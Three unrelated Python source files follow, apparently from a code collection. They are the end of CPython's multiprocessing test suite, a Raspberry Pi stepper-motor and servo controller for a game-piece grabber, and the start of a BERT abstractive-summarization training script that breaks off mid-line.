time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
pid = _semaphore_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("semaphore_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGTERM, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
stepper_controller.py
|
import pigpio
import time
import threading
import math
pi = pigpio.pi()
gpio_pin_lst = (14, 15, 18, 23, 24, 25, 8, 16, 20)
DIR_PIN1, STEP_PIN1, DIR_PIN2, STEP_PIN2, M2, M1, M0, GRAB_SERVO, MAG_SERVO = gpio_pin_lst
for pin in gpio_pin_lst:
pi.set_mode(pin, pigpio.OUTPUT)
pi.write(M0, 1)
pi.write(M1, 0)
pi.write(M2, 0)
home_distance = 950
side_distance = 120
square_side = 374
magnet_up = 1100
magnet_down = 810
grabber_up = 1650
grabber_down_normal = 1025
grabber_down_king = 1115
class Stepper:
def __init__(self, step_pin, dir_pin):
self.coord = 0
self.step_pin = step_pin
self.dir_pin = dir_pin
self.velocity = 0
def move(self, coord):
travel = coord - self.coord
if travel != 0:
accel_travel = int((travel/abs(travel)))*100
decel_travel = int((travel/abs(travel)))*70
linear_travel = travel - accel_travel - decel_travel
direction = self.coord < coord
if (linear_travel < 0) == (travel < 0):
self.accelerate(accel_travel)
for i in range(abs(linear_travel)):
self.step(direction)
self.decelerate(decel_travel)
else:
small_acceleration = int(travel/2)
small_decel = travel - small_acceleration
self.accelerate(small_acceleration)
self.decelerate(small_decel)
def step(self, dir_positive):
if dir_positive:
pi.write(self.dir_pin, 1)
self.coord += 1
else:
pi.write(self.dir_pin, 0)
self.coord -= 1
pi.write(self.step_pin, 1)
time.sleep(0.001)
pi.write(self.step_pin, 0)
def accelerate(self, steps):
current_steps = abs(steps)
steps_amount = abs(steps)
interval = 0.001
while current_steps > 0:
time.sleep((current_steps/steps_amount)**(1/4)*interval)
self.step(steps > 0)
current_steps -= 1
def decelerate(self, steps):
current_steps = 0
interval = 0.001
while current_steps < abs(steps):
time.sleep(math.sqrt(current_steps/abs(steps))*interval)
self.step(steps > 0)
current_steps += 1
tst_stepper1 = Stepper(STEP_PIN1, DIR_PIN1)
tst_stepper2 = Stepper(STEP_PIN2, DIR_PIN2)
def move_to(x, y):
t1 = threading.Thread(target=tst_stepper1.move, args=(side_distance+square_side*(x-1),))
t2 = threading.Thread(target=tst_stepper2.move, args=(home_distance+square_side*(y-1),))
t1.start()
t2.start()
t1.join()
t2.join()
def move_home():
t1 = threading.Thread(target=tst_stepper1.move, args=(0,))
t2 = threading.Thread(target=tst_stepper2.move, args=(0,))
t1.start()
t2.start()
t1.join()
t2.join()
def grabber_lower(king=False):
if king:
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_down_king)
else:
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_down_normal)
time.sleep(0.3)
pi.set_servo_pulsewidth(GRAB_SERVO, 0)
def grabber_lower_with_height(pieces):
piece_height = 80
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_down_normal + piece_height*(pieces-1))
time.sleep(0.3)
pi.set_servo_pulsewidth(GRAB_SERVO, 0)
def grabber_elevate():
pi.set_servo_pulsewidth(GRAB_SERVO, grabber_up)
time.sleep(0.3)
pi.set_servo_pulsewidth(GRAB_SERVO, 0)
def magnet_lower():
pi.set_servo_pulsewidth(MAG_SERVO, magnet_down)
time.sleep(0.2)
pi.set_servo_pulsewidth(MAG_SERVO, 0)
def magnet_elevate():
pi.set_servo_pulsewidth(MAG_SERVO, magnet_up)
time.sleep(0.2)
pi.set_servo_pulsewidth(MAG_SERVO, 0)
def grabber_grab(king=False):
grabber_lower(king)
magnet_lower()
grabber_elevate()
def grabber_drop(king=False):
grabber_lower(king)
magnet_elevate()
grabber_elevate()
grabber_elevate()
magnet_elevate()
|
train_abstractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.loss import abs_loss
from models.model_builder import AbsSummarizer
from models.predictor import build_predictor
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
